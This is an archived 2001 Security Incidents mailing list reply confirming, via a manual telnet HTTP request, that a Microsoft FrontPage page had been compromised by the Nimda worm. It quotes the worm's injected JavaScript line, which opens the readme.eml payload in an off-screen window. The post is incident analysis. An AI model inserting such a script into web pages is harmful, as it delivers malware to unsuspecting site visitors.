Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Please tell me I'm wrong: microsoft.com infected

From: "Jay D. Dyson" <jdyson () treachery net>
Date: Wed, 19 Sep 2001 15:02:43 -0700 (PDT)
-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 19 Sep 2001, Steve Cody wrote: 


I just went to http://www.microsoft.com/frontpage, and my Symantec
Norton Antivirus popped up and denied access to readme.eml. 

I could not view the source of the loaded page, so I can't verify that
it is definitely infected. 


        Your worst fears have now been confirmed.

sasumata$ telnet www.microsoft.com 80
Trying 207.46.197.100...
Connected to www.microsoft.akadns.net.
Escape character is '^]'.
GET /frontpage/ HTTP/1.0

<snip>

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

        Microsoft's site has been compromised by Nimda.  There is no
disputing it now.

- -Jay

  (    (                                                          _______
  ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) |    = |-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA
APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv
acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc
5CjLcnLK5U8=
=DIF4
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: